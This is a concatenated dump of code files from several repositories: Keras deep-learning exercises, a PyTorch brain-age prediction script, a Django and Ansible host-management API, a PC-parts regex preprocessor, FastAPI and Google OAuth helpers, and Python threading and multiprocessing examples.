# Normalization trick: we normalize the gradient
grads /= (K.sqrt(K.mean(K.square(grads))) + 1e-5) # 1e-5 in case divided by 0
# This function returns the loss and grads given the input picture
iterate = K.function([model.input], [loss, grads])
# We start from a gray image with some noise
input_img_data = np.random.random((1, size, size, 3)) * 20 + 128. # This is a start and 128 is a noise
# random a array whose shape is (1, 150, 150, 3) and elements in this array is [0, 1]
# Run gradient ascent for 40 steps
step = 1.
for i in range(40):
loss_value, grads_value = iterate([input_img_data]) # iterate is defined above. input and output are defined 2.
input_img_data += grads_value * step # gradient rise
img = input_img_data[0]
return deprocess_image(img)
# plot
import matplotlib.pyplot as plt
plt.imshow(generate_pattern('block3_conv1', 0))
plt.show()
print('5.4.2 show one filter"s visualization done')
print('---------------------------------------------------------------------------------------------------------------')
# show the first 64 filters's visualization of each convnet network's first layer
for layer_name in ['block1_conv1', 'block2_conv1', 'block3_conv1', 'block4_conv1']:
size = 64
margin = 5
# This a empty (black) image where we will store our results.
results = np.zeros((8 * size + 7 * margin, 8 * size + 7 * margin, 3))
for i in range(8): # iterate over the rows of our results grid
for j in range(8): # iterate over the columns of our results grid
# Generate the pattern for filter `i + (j * 8)` in `layer_name`
filter_img = generate_pattern(layer_name, i + (j * 8), size=size) # generate_pattern defined above
# Put the result in the square `(i, j)` of the results grid
horizontal_start = i * size + i * margin
horizontal_end = horizontal_start + size
vertical_start = j * size + j * margin
vertical_end = vertical_start + size
results[horizontal_start: horizontal_end, vertical_start: vertical_end, :] = filter_img
# Display the results grid
plt.figure(figsize=(20, 20))
plt.imshow(results)
plt.show()
print('5.4.2 show the first 64 filters"s visualization of each convnet network"s first layer done')
print('---------------------------------------------------------------------------------------------------------------')
```
#### File: 83286415/DeepLearningWithPythonKeras/6.3.6-recurrent-dropout-to-fight-overfitting.py
```python
import keras
print(keras.__version__) # 2.1.6
import os
# prepare the climate data
base_dir = 'D:/AI/deep-learning-with-python-notebooks-master'
climate_dir = os.path.join(base_dir, 'jena_climate')
fname = os.path.join(climate_dir, 'jena_climate_2009_2016.csv')
f = open(fname)
data = f.read()
f.close()
# CSV file read
lines = data.split('\n')
header = lines[0].split(',')
lines = lines[1:] # title is not included
# data analysis
import numpy as np
float_data = np.zeros((len(lines), len(header) - 1)) # len(header)-1: data time is not included
for i, line in enumerate(lines):
values = [float(x) for x in line.split(',')[1:]]
float_data[i, :] = values # put values of climate data into float_date list without data time
# without standardization, loss will be 4+
mean = float_data[:200000].mean(axis=0)
float_data -= mean
std = float_data[:200000].std(axis=0)
float_data /= std
def generator(data, lookback, delay, min_index, max_index,
shuffle=False, batch_size=128, step=6):
if max_index is None:
max_index = len(data) - delay - 1
i = min_index + lookback
while 1:
if shuffle:
rows = np.random.randint(
min_index + lookback, max_index, size=batch_size)
else:
if i + batch_size >= max_index:
i = min_index + lookback
rows = np.arange(i, min(i + batch_size, max_index))
i += len(rows)
samples = np.zeros((len(rows),
lookback // step,
data.shape[-1]))
targets = np.zeros((len(rows),))
for j, row in enumerate(rows):
indices = range(rows[j] - lookback, rows[j], step)
samples[j] = data[indices]
targets[j] = data[rows[j] + delay][1]
yield samples, targets
lookback = 1440
step = 6
delay = 144
batch_size = 128
train_gen = generator(float_data,
lookback=lookback,
delay=delay,
min_index=0,
max_index=200000,
shuffle=True,
step=step,
batch_size=batch_size)
val_gen = generator(float_data,
lookback=lookback,
delay=delay,
min_index=200001,
max_index=300000,
step=step,
batch_size=batch_size)
test_gen = generator(float_data,
lookback=lookback,
delay=delay,
min_index=300001,
max_index=None,
step=step,
batch_size=batch_size)
# This is how many steps to draw from `val_gen`
# in order to see the whole validation set:
val_steps = (300000 - 200001 - lookback) // batch_size
# This is how many steps to draw from `test_gen`
# in order to see the whole test set:
test_steps = (len(float_data) - 300001 - lookback) // batch_size
print('prepare the climate data done')
print('---------------------------------------------------------------------------------------------------------------')
# 6.3.6 recurrent dropout against overfitting
# build network model
from keras.models import Sequential
from keras import layers
from keras.optimizers import RMSprop
model = Sequential()
model.add(layers.GRU(32,
dropout=0.2,
recurrent_dropout=0.2,
input_shape=(None, float_data.shape[-1]))) # dropout recurrent_dropout
model.add(layers.Dense(1))
model.compile(optimizer=RMSprop(), loss='mae')
history = model.fit_generator(train_gen,
steps_per_epoch=500,
epochs=40,
validation_data=val_gen,
validation_steps=val_steps)
# plot
import matplotlib.pyplot as plt
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(loss))
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
```
#### File: 83286415/DeepLearningWithPythonKeras/7.2.1-model-callbacks-in-training-process.py
```python
import keras
print(keras.__version__) # 2.2.4
from keras import layers
from keras import models
from keras.datasets import mnist
from keras.utils import to_categorical
# 5.1 py
# Import codes from 5.1 py for data preparation and model building
# build the network model
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.Flatten()) # 3D->1D
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax')) # multi-classification
# prepare mnist data
(train_images, train_labels), (test_images, test_labels) = mnist.load_data() # total 70000 images in MNIST
train_images = train_images.reshape((60000, 28, 28, 1))
train_images = train_images.astype('float32') / 255 # astype: keep the int part
test_images = test_images.reshape((10000, 28, 28, 1)) # reshape 255 -> 1
test_images = test_images.astype('float32') / 255 # make values in [0, 255] to values in [0, 1]
train_labels = to_categorical(train_labels) # one_hot labels
test_labels = to_categorical(test_labels)
# commented out below codes for adding callbacks in fit process
# model.compile(optimizer='rmsprop',
# loss='categorical_crossentropy',
# metrics=['acc'])
# model.fit(train_images, train_labels, epochs=5, batch_size=64)
#
# test_loss, test_acc = model.evaluate(test_images, test_labels)
# print(test_loss, test_acc) # 0.0261321800082751 0.9926 better than 0.978 which in chapter 2 using dense layers
print('data preparation and model building done')
print('---------------------------------------------------------------------------------------------------------------')
# 7.2.1.3 define my own callbacks
import keras
class ActivationLogger(keras.callbacks.Callback):
def set_model(self, model):
self.model = model
layer_outputs = [layer.output for layer in model.layers] # can read model's property
self.activations_model = keras.models.Model(model.input, layer_outputs) # can make Model instance
def on_epoch_end(self, epoch, logs=None): # other 5 defs could be recognized by fit(): refer to book P212
if self.validation_data is None: # can read validation_data in fit()
raise RuntimeError('Requires validation_data.')
f = open('activations_at_epoch_' + str(epoch) + '.txt', 'w')
f.write('the first epoch activation saved by my own callbacks')
f.close()
print('define my own callbacks done')
print('---------------------------------------------------------------------------------------------------------------')
# 7.2.1.1 keras callbacks in training process
import os
base_dir = 'D:/AI/deep-learning-with-python-notebooks-master'
h5_path = os.path.join(base_dir, '7.2.1_model_checkpoint.h5')
# callback (list) should be defined in front of the fit()
callbacks_list = [keras.callbacks.EarlyStopping(monitor='val_acc', patience=1,),
keras.callbacks.ModelCheckpoint(filepath=h5_path, monitor='val_loss', save_best_only=True),
keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=3), # keras callbacks
ActivationLogger()] # my own callback
# import compile() and fit() from 5.1 py and add callbacks into the fit() as below
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['acc'])
history = model.fit(train_images, train_labels, epochs=20, batch_size=64, callbacks=callbacks_list, validation_split=0.2)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print(test_loss, test_acc) # 0.03851035969056033 0.9921
# plot
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
print('keras callbacks in training process done')
print('---------------------------------------------------------------------------------------------------------------')
``` |
{
"source": "834799106/TSAN-brain-age-estimation",
"score": 2
} |
#### File: TSAN-brain-age-estimation/TSAN/prediction_first_stage.py
```python
import numpy as np
import torch.nn as nn
import os,shutil,torch
import matplotlib.pyplot as plt
from utils.config import opt
from load_data import IMG_Folder
from model import ScaleDense
from scipy.stats import pearsonr,spearmanr
from sklearn.metrics import mean_absolute_error
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def metric(output, target):
target = target.data.numpy()
pred = output.cpu()
pred = pred.data.numpy()
mae = mean_absolute_error(target,pred)
return mae
def main():
# ======== define data loader and CUDA device ======== #
test_data = IMG_Folder(opt.excel_path, opt.test_folder)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# ======== build and set model ======== #
if opt.model == 'ScaleDense':
model = ScaleDense.ScaleDense(8, 5, opt.use_gender)
else:
print('Wrong model choose')
# ======== load trained parameters ======== #
model = nn.DataParallel(model).to(device)
criterion = nn.MSELoss().to(device)
model.load_state_dict(torch.load(os.path.join(opt.output_dir+opt.model_name))['state_dict'])
# ======== build data loader ======== #
test_loader = torch.utils.data.DataLoader(test_data
,batch_size=opt.batch_size
,num_workers=opt.num_workers
,pin_memory=True
,drop_last=True
)
# ======== test preformance ======== #
test( valid_loader=test_loader
, model=model
, criterion=criterion
, device=device
, save_npy=True
, npy_name=opt.npz_name
, figure=False
, figure_name=opt.plot_name)
def test(valid_loader, model, criterion, device
, save_npy=False,npy_name='test_result.npz'
, figure=False, figure_name='True_age_and_predicted_age.png'):
'''
[Do Test process according pretrained model]
Args:
valid_loader (torch.dataloader): [test set dataloader defined in 'main']
model (torch CNN model): [pre-trained CNN model, which is used for brain age estimation]
criterion (torch loss): [loss function defined in 'main']
device (torch device): [GPU]
save_npy (bool, optional): [If choose to save predicted brain age in npy format]. Defaults to False.
npy_name (str, optional): [If choose to save predicted brain age, what is the npy filename]. Defaults to 'test_result.npz'.
figure (bool, optional): [If choose to plot and save scatter plot of predicted brain age]. Defaults to False.
figure_name (str, optional): [If choose to save predicted brain age scatter plot, what is the png filename]. Defaults to 'True_age_and_predicted_age.png'.
Returns:
[float]: MAE and pearson correlation coeficent of predicted brain age in teset set.
'''
losses = AverageMeter()
MAE = AverageMeter()
model.eval() # switch to evaluate mode
out, targ, ID = [], [], []
target_numpy, predicted_numpy, ID_numpy = [], [], []
print('======= start prediction =============')
# ======= start test programmer ============= #
with torch.no_grad():
for _, (input, ids ,target,male) in enumerate(valid_loader):
input = input.to(device).type(torch.FloatTensor)
# ======= convert male lable to one hot type ======= #
male = torch.unsqueeze(male,1)
male = torch.zeros(male.shape[0],2).scatter_(1,male,1)
male = male.type(torch.FloatTensor).to(device)
target = torch.from_numpy(np.expand_dims(target,axis=1))
target = target.type(torch.FloatTensor).to(device)
# ======= compute output and loss ======= #
if opt.model == 'ScaleDense' :
output = model(input,male)
else:
output = model(input)
out.append(output.cpu().numpy())
targ.append(target.cpu().numpy())
ID.append(ids)
loss = criterion(output, target)
mae = metric(output.detach(), target.detach().cpu())
# ======= measure accuracy and record loss ======= #
losses.update(loss, input.size(0))
MAE.update(mae, input.size(0))
targ = np.asarray(targ)
out = np.asarray(out)
ID = np.asarray(ID)
for idx in targ:
for i in idx:
target_numpy.append(i)
for idx in out:
for i in idx:
predicted_numpy.append(i)
for idx in ID:
for i in idx:
ID_numpy.append(i)
target_numpy = np.asarray(target_numpy)
predicted_numpy = np.asarray(predicted_numpy)
ID_numpy = np.asarray(ID_numpy)
errors = predicted_numpy - target_numpy
abs_errors = np.abs(errors)
errors = np.squeeze(errors,axis=1)
abs_errors = np.squeeze(abs_errors,axis=1)
target_numpy = np.squeeze(target_numpy,axis=1)
predicted_numpy = np.squeeze(predicted_numpy,axis=1)
# ======= output several results ======= #
print('===============================================================\n')
print(
'TEST : [steps {0}], Loss {loss.avg:.4f}, MAE: {MAE.avg:.4f} \n'.format(
len(valid_loader), loss=losses, MAE=MAE))
print('STD_err = ', np.std(errors))
print(' CC: ',np.corrcoef(target_numpy,predicted_numpy))
print('PAD spear man cc',spearmanr(errors,target_numpy,axis=1))
print('spear man cc',spearmanr(predicted_numpy,target_numpy,axis=1))
print('mean pad:',np.mean(errors))
print('\n =================================================================')
if save_npy:
savepath = os.path.join(opt.output_dir,npy_name)
np.savez(savepath
,target=target_numpy
,prediction=predicted_numpy
,ID=ID_numpy)
# ======= Draw scatter plot of predicted age against true age ======= #
if figure is True:
plt.figure()
lx = np.arange(np.min(target_numpy),np.max(target_numpy))
plt.plot(lx,lx,color='red',linestyle='--')
plt.scatter(target_numpy,predicted_numpy)
plt.xlabel('Chronological Age')
plt.ylabel('predicted brain age')
# plt.show()
plt.savefig(opt.output_dir+figure_name)
return MAE ,np.corrcoef(target_numpy,predicted_numpy)
if __name__ == "__main__":
main()
```
#### File: TSAN/utils/discriminate_age.py
```python
import torch
import numpy as np
def discriminate_age(age, range=5):
'''
[summary]
Args:
age (numpy array): [predicted brain age from first stage network, which is needed to discriminate.]
range (int, optional): [discritized delta]. Defaults to 5.
Returns:
[numpy array]: [discritized predicted brain age]
'''
dis = []
for i in age:
value = i // range
x = i % range
if x < range/2:
discri_age = value * range
else:
discri_age = (value+1)*range
dis.append(discri_age)
dis_age = np.asarray(dis,dtype='float32')
dis_age = np.expand_dims(dis_age,axis=1)
dis_age = torch.from_numpy(dis_age)
return dis_age
``` |
{
"source": "837278709/django-host-manage",
"score": 2
} |
#### File: django-host-manage/host_management/views.py
```python
from __future__ import unicode_literals
from collections import OrderedDict
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework import viewsets
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
from .models import Host, BusinessLine
from .serializers import HostSerializer
from . import ansible_cli
def run_shell(request):
hosts = ['localhost,127.0.0.1']
cmd = "cat /etc/hostname"
ansible_cli.shell_cli(hosts, shell_cmd=cmd,
module="shell", remote_user="root")
return
def get_host_info(request):
hosts = ['localhost,192.168.31.247']
cmd = "gather_subset=min"
ansible_cli.shell_cli(hosts, shell_cmd=cmd,
module="setup", remote_user="root")
return
class StandardResultsSetPagination(PageNumberPagination):
page_size = 100
page_size_query_param = 'page_size'
max_page_size = 1000
def get_paginated_response(self, data):
return Response(OrderedDict([
('business_line', BusinessLine.objects.values('id','name',)),
('page', None),
('count_page', None),
('count', self.page.paginator.count),
('next', self.get_next_link()),
('previous', self.get_previous_link()),
('table_header', None),
('results', data)
]))
class HostViewSet(viewsets.ModelViewSet):
queryset = Host.objects.all()
serializer_class = HostSerializer
pagination_class = StandardResultsSetPagination
filter_backends = (filters.OrderingFilter, filters.SearchFilter,
DjangoFilterBackend)
ordering_fields = ('create_time', 'update_time')
ordering = ('-update_time',)
search_fields = ('hostname', )
filter_fields = ('business_line', 'address', 'os_type', 'name', 'domain')
def list(self, request, *args, **kwargs):
table_header = [{
"title": "IP",
"index": "name"
}, {
"title": "主机名",
"index": "hostname"
}, {
"title": "内存",
"index": "memory"
}, {
"title": "磁盘",
"index": "disk"
}, {
"title": "网络域",
"index": "domain"
}, {
"title": "CPU 数",
"index": "cpu"
}, {
"title": "地址",
"index": "address_name"
}, {
"title": "业务线",
"index": "business_line"
}, {
"title": "创建时间",
"index": "create_time"
}, {
"title": "更新时间",
"index": "update_time"
}, {
"title": "备注信息",
"index": "note"
}]
rv = super(HostViewSet, self).list(request, *args, **kwargs)
if not rv.data.get("table_header"):
rv.data["table_header"] = table_header
page_size = request.query_params.get('page_size')
count = rv.data.get("count")
if not page_size:
page_size = StandardResultsSetPagination.page_size
else:
page_size = int(page_size)
if not rv.data.get("count_page"):
rv.data["count_page"] = count // page_size + 1
rv.data["page"] = request.query_params.get('page')
return rv
``` |
{
"source": "837477/COMTRIS_AI",
"score": 3
} |
#### File: src/db_preprocessor/regex_processor.py
```python
import os
import re
from tqdm import tqdm
from pymongo import MongoClient
class RegexPreprocessor():
'''데이터 정규식 전처리기'''
def __init__(self):
self.cpu_regex = ""
self.vga_regex = ""
self.mb_regex = ""
self.ram_regex = ""
self.ssd_regex = ""
self.power_regex = ""
self.ram_clock = {
"25600": "3200",
"24000": "3000",
"23400": "2933",
"21300": "2666",
"19200": "2400",
"38400": "4800",
"36800": "4600",
"36000": "4500",
"35200": "4400",
"34400": "4300",
"34100": "4266",
"33000": "4133",
"32000": "4000",
"30900": "3866",
"30400": "3800",
"28800": "3600",
"27700": "3466",
"27200": "3400",
"26600": "3333",
"22400": "2800",
"17000": "2133",
"22400": "2800",
"21300": "2666",
"19200": "2400",
"17000": "2133",
"14900": "1866",
"12800": "1600",
"10600": "1333",
"10000": "1250",
"8500" : "1066"
}
def cpu(self, text):
brand = "AMD"
for check in ["INTEL", "intel", "인텔"]:
if check in text:
brand = "INTEL"
if brand == "INTEL":
regex_result = re.findall("\d{4,5}KF|\d{4,5}K|\d{4,5}F|\d{4,5}X|\d{4,5}", text)
else:
regex_result = re.findall("\d{4,5}X|\d{4,5}G|\d{4,5}", text)
if not regex_result:
return None
return brand + " " + regex_result[0]
def vga(self, text):
brand = re.findall("GAINWARD|이엠텍|MSI|ZOTAC|갤럭시|ASUS|GIGABYTE|PowerColor|리드텍|AFOX|AKiTiO|AMD|ARKTEK|ASRock|ATUM|AXLE|COLORFUL|EVGA|FORSA|HIS|INNO3D|MANLI|MAXSUN|NETSTOR|NVIDIA|PALIT|PNY|Razer|SAPPHIRE|SNK테크|SOYO|Sonnet|TAGER|XFX|레노버|매트록스|세컨드찬스|엠탑코리아", text)
chipset = re.findall("GTX\d{3,4}SUPER|GTX \d{3,4}SUPER|GTX\d{3,4} SUPER|GTX \d{3,4} SUPER|GTX\d{3,4}Ti|GTX \d{3,4}Ti|GTX\d{3,4} Ti|GTX \d{3,4} Ti|GTX\d{3,4}TI|GTX \d{3,4}TI|GTX\d{3,4} TI|GTX \d{3,4} TI|GTX\d{3,4}|GTX \d{3,4}|RTX\d{3,4}super|RTX \d{3,4}super|RTX\d{3,4} super|RTX \d{3,4} super|RTX\d{3,4}SUPER|RTX \d{3,4}SUPER|RTX\d{3,4} SUPER|RTX \d{3,4} SUPER|RTX\d{3,4}Ti|RTX \d{3,4}Ti|RTX\d{3,4} Ti|RTX \d{3,4} Ti|RTX\d{3,4}|RTX \d{3,4}|RX\d{3,4}XT|RX \d{3,4}XT|RX\d{3,4} XT|RX \d{3,4} XT|RX\d{3,4}|RX \d{3,4}", text)
if (not brand) or (not chipset):
return None
return chipset[0].upper().replace(" ", "") + " " + brand[0].upper()
def mb(self, text):
brand = re.findall("ASRock|ASUS|MSI|GIGABYTE|ECS|AFOX|ASRock Rack|Arduino|BIOSTAR|COLORFUL|FOXCONN|JETWAY|Maxtang|Raspberry Pi|Supermicro|TYAN|디지탈그린텍|마이크로닉스|이엠텍|인텍앤컴퍼니|인텔|코코아팹", text)
chipset = re.findall("\w\d{2,3}\w", text)
if (not brand) or (not chipset):
return None
return chipset[0].upper() + " " + brand[0].upper()
def ram(self, text):
# brand = re.findall("삼성전자|ADATA|G.SKILL|GeIL|ACPI|AFOX|AVEXIR|Antec|Apacer|CORSAIR|CYNEX|Dreamware|EKMEMORY|ESSENCORE|GIGABYTE|GLOWAY|GSMS|HP|INNO3D|KINGMAX|LANSON|OCPC|OLOy|PATRIOT|PNY|SK하이닉스|TeamGroup|Terabyte|V-Color|ZADAK|갤럭시|건평정보통신|디자인|마이크론|실리콘파워|써멀테이크|어드반|오존컴퍼니|이메이션|킹스톤|타무즈|트랜센드", text)
chipset = re.findall("\d{5}|\d{4}", text)
volume = re.findall("\d{1,2}GB|\d{1,2}gb|\d{1,2}G|\d{1,2}g", text)
if (not chipset) or (not volume):
return None
# 칩셋 재가공
if len(chipset[0]) == 5:
chipset[0] = self.ram_clock[chipset[0]]
# 용량 재가공
if len(volume) >= 2:
for idx, value in enumerate(volume):
volume[idx] = volume[idx].replace("GB", "")
volume[idx] = volume[idx].replace("G", "")
volume[idx] = volume[idx].replace("gb", "")
volume[idx] = volume[idx].replace("g", "")
volume[idx] = int(volume[idx])
volume[0] = str(max(volume)) + "GB"
if volume[0][-1] == "G":
volume[0] += "B"
return chipset[0] + " " + volume[0]
def ssd(self, text):
# brand = re.findall("삼성전자|마이크론|ADATA|Western Digital|ACPI|AFOX|ASUS|AVEXIR|Apacer|Axxen|BIOSTAR|BIWIN|BLUE-I|COLORFUL|COOLERTEC|CORSAIR|CRAFT|DATARAM|DIGIFAST|DIGISTOR|EAGET|EKMEMORY|ESSENCORE|EVERCOOL|EXASCEND|FOXCONN|Faspeed|GIGABYTE|GLOWAY|GeIL|GrinMax|HGST|HIKVISION|HP|ICY DOCK|IPT|JEYI|KINGMAX|Kim MiDi|Kimtigo|KingDian|KingSpec|Korlet|Lexar|Lite-On|Longsys|MAIWO|MARSHAL|MK2|MUSHKIN|MiSD|MyDigitalSSD|MySSD|NCTOP|NOFAN|Netac|OCPC|OCZ SS|ORICO|OWC|PALIT|PATRIOT|PHINOCOM|PNY|Plextor|RAMIS|RiTEK|SK하이닉스|SONY|STARSWAY|STCOM|SUNEAST|Sandisk|Seagate|SilverStone|Supertalent|Synology|TCSUNBOW|TOPDISK|TeamGroup|Toshiba|UNITEK|Union Memory|VIA|Vaseky|VisionTek|ZOTAC|innoDisk", text)
volume = re.findall("\d{3}GB|\dTB|\d{3}gb|\dtb|\d{3}G|\dT|\d{3}g|\dt", text)
if (not volume):
return None
return volume[0].upper()
def power(self, text):
regex_result = re.findall("\d{3,4}W|\d{3,4}w|\d{3,4}", text)
if not regex_result:
return None
regex_result[0] = regex_result[0].upper()
if regex_result[0][-1] != "W":
regex_result[0] = regex_result[0] + "W"
return regex_result[0]
if __name__ == "__main__":
db = MongoClient(os.environ['COMTRIS_MONGODB_URI'])['COMTRIS']
rp = RegexPreprocessor()
for col in ['gallery', 'review', 'pc_quote']:
print(col, "Re Preprocessing...")
targets = list(db[col].find({}, {'shop_date': 0, 'crawl_date': 0, 'id': 0, 'pass': 0}))
for idx in tqdm(range(len(targets))):
for key, value in targets[idx]['original'].items():
if key == "CPU":
regex_result = rp.cpu(value)
targets[idx]['CPU'] = regex_result
elif key == "M/B" or key == "M/b":
regex_result = rp.mb(value)
targets[idx]['M/B'] = regex_result
elif key == "RAM":
regex_result = rp.ram(value)
targets[idx]['RAM'] = regex_result
elif key == "VGA":
regex_result = rp.vga(value)
targets[idx]['VGA'] = regex_result
elif key == "SSD":
regex_result = rp.ssd(value)
targets[idx]['SSD'] = regex_result
elif key == "POWER":
regex_result = rp.power(value)
targets[idx]['POWER'] = regex_result
db[col].update_one({'_id': targets[idx]['_id']}, {'$set': targets[idx]})
``` |
{
"source": "837477/FastAPI-Pymongo",
"score": 2
} |
#### File: app/routers/templates.py
```python
from fastapi import APIRouter, Request
from fastapi.templating import Jinja2Templates
router = APIRouter()
templates = Jinja2Templates(directory="app/assets")
@router.get("/")
async def index(request: Request):
"""
Return Main Page
"""
return templates.TemplateResponse("index.html", {"request": request})
``` |
{
"source": "837477/Oauth",
"score": 3
} |
#### File: Oauth/controller/google.py
```python
import requests
class GoogleOauth:
def __init__(self, config):
self.athorization_server = "https://accounts.google.com/o/oauth2/v2/auth"
self.api_server = "https://oauth2.googleapis.com"
self.client_id = config.GOOGLE_CLIENT_ID
self.secret_key = config.GOOGLE_SECRET_KEY
self.redirect_uri = config.GOOGLE_REDIRECT_URI
def auth(self, code):
"""
사용자로부터 전달 받은 Authorization code를 통하여,
Access / Refresh Token 발행 요청
"""
return requests.post(
url=self.api_server + "/token",
headers={
"Content-Type": "application/x-www-form-urlencoded",
"Cache-Control": "no-cache",
},
data={
"grant_type": "authorization_code",
"client_id": self.client_id,
"client_secret": self.secret_key,
"redirect_uri": self.redirect_uri,
"code": code,
}
).json()
def refresh(self, refresh_token):
"""
Refresh Token을 통하여, 새로운 Access Token 발행 요청
"""
return requests.post(
url=self.api_server + "/token",
headers={
"Content-Type": "application/x-www-form-urlencoded",
"Cache-Control": "no-cache",
},
data={
"grant_type": "refresh_token",
"client_id": self.client_id,
"client_secret": self.secret_key,
"refresh_token": refresh_token
}
).json()
def url(self):
"""
사용자 측에서 접속 할 URL 생성
"""
url = self.athorization_server \
+ "?scope={}" \
+ "&include_granted_scopes={}" \
+ "&response_type={}" \
+ "&state={}" \
+ "&access_type=offline" \
+ "&prompt=consent" \
+ "&redirect_uri={}" \
+ "&client_id={}"
return url.format(
"https://www.googleapis.com/auth/userinfo.email",
"true",
"code",
"state_parameter_passthrough_value",
self.redirect_uri,
self.client_id
)
@staticmethod
def userinfo(access_token):
"""
Access Token을 통하여, 사용자 Information 요청
"""
return requests.get(
url="https://www.googleapis.com/oauth2/v1/userinfo?alt=json&access_token={}".format(
access_token
)
).json()
```
#### File: model/mongodb/user.py
```python
from model.mongodb import Model
class User(Model):
def upsert_user(self, document):
self.col.update_one(
{'id': document['id']},
{'$set': self.schemize(document)},
upsert=True
)
``` |
{
"source": "837477/Python_Parallel",
"score": 3
} |
#### File: Python_Parallel/03_thread_life/classThread.py
```python
from threading import Thread
class myWorkerThread(Thread):
def __init__(self):
print("Hello world")
Thread.__init__(self)
def run(self):
print("Thread is now running")
myThread = myWorkerThread()
print("Created my Thread Object")
myThread.start()
print("Started my thread")
myThread.join()
print("My Thread finished")
```
#### File: Python_Parallel/03_thread_life/forkVsCreate.py
```python
import threading
from multiprocessing import Process
import time
import os
def MyThread():
time.sleep(2)
t0 = time.time()
threads = []
for i in range(10):
thread = threading.Thread(target=MyThread)
thread.start()
threads.append(thread)
t1 = time.time()
print("Total Time for Creating 10 Threads: {} seconds".format(t1-t0))
for thread in threads:
thread.join()
t2 = time.time()
procs = []
for i in range(10):
process = Process(target=MyThread)
process.start()
procs.append(process)
t3 = time.time()
print("Total Time for Creating 10 Processes: {} seconds".format(t3-t2))
for proc in procs:
proc.join()
```
#### File: Python_Parallel/03_thread_life/slowDown.py
```python
import time
import random
import threading
def calculatePrimeFactors(n):
primfac = []
d = 2
while d*d <= n:
while (n % d) == 0:
primfac.append(d)
n //= d
d += 1
if n > 1:
primfac.append(n)
return primfac
def executeProc():
for i in range(1000):
rand = random.randint(20000, 100000000)
print(calculatePrimeFactors(rand))
def main():
print("Starting number crunching")
t0 = time.time()
threads = []
for i in range(10):
thread = threading.Thread(target=executeProc)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
t1 = time.time()
totalTime = t1 - t0
print("Execution Time: {}".format(totalTime))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/06_debugging_and_benchmarking/timeitTest.py
```python
import threading
import random
import time
def myWorker():
for i in range(5):
print("Starting wait time")
time.sleep(random.randint(1,5))
print("Completed Wait")
thread1 = threading.Thread(target=myWorker)
thread2 = threading.Thread(target=myWorker)
thread3 = threading.Thread(target=myWorker)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
```
#### File: Python_Parallel/08_multi_processing/exceptionHandling.py
```python
import multiprocessing
import os, sys
import traceback
class MyProcess(multiprocessing.Process):
def __init__(self, pipein):
super(MyProcess, self).__init__()
self.pipein = pipein
def run(self):
try:
raise Exception("This broke stuff")
except:
except_type, except_class, tb = sys.exc_info()
self.pipein = os.fdopen(self.pipein, 'w')
self.pipein.write(str(tb))
self.pipein.close()
def main():
pipeout, pipein = os.pipe()
childProcess = MyProcess(pipein)
childProcess.start()
childProcess.join()
os.close(pipein)
pipeout = os.fdopen(pipeout)
pipeContent = pipeout.read()
print("Exception: {}".format(pipeContent))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/mapPool.py
```python
from multiprocessing import Pool
import time
def myTask(n):
time.sleep(n+2)
return n+2
def main():
with Pool(4) as p:
for iter in p.imap_unordered(myTask, [1,3,2,1]):
print(iter)
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/maxTasks.py
```python
from multiprocessing import Pool
import time
import os
def myTask(x, y):
print("{} Executed my task".format(os.getpid()))
return y*2
def main():
with Pool(processes=1, maxtasksperchild=2) as p:
print(p.starmap_async(myTask, [(4,3),(2,1), (3,2), (5,1)]).get())
print(p.starmap_async(myTask, [(4,3),(2,1), (3,2), (2,3)]).get())
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/mpExample.py
```python
from multiprocessing import Pool
import timeit
import math
PRIMES = [
112272535095293,
112582705942171,
112272535095293,
115280095190773,
115797848077099,
112272535095293,
115280095190773,
115797848077099,
112272535095293,
115280095190773,
115797848077099,
112272535095293,
115280095190773,
115797848077099,
1099726899285419]
def is_prime(n):
if n % 2 == 0:
return False
sqrt_n = int(math.floor(math.sqrt(n)))
for i in range(3, sqrt_n + 1, 2):
if n % i == 0:
return False
return True
def main():
t1 = timeit.default_timer()
with Pool(4) as p:
print(p.map(is_prime, PRIMES))
print("{} Seconds needed for multiprocessing pool".format(timeit.default_timer() - t1))
if __name__ == '__main__':
main()
```
#### File: Python_Parallel/08_multi_processing/pipes.py
```python
import os, sys
import multiprocessing
class ChildProcess(multiprocessing.Process):
def __init__(self, pipein):
super(ChildProcess, self).__init__()
self.pipein = pipein
def run(self):
print("Attempting to pipein to pipe")
self.pipein = os.fdopen(self.pipein, 'w')
self.pipein.write("My Name is Elliot")
self.pipein.close()
def main():
pipeout, pipein = os.pipe()
child = ChildProcess(pipein)
child.start()
child.join()
os.close(pipein)
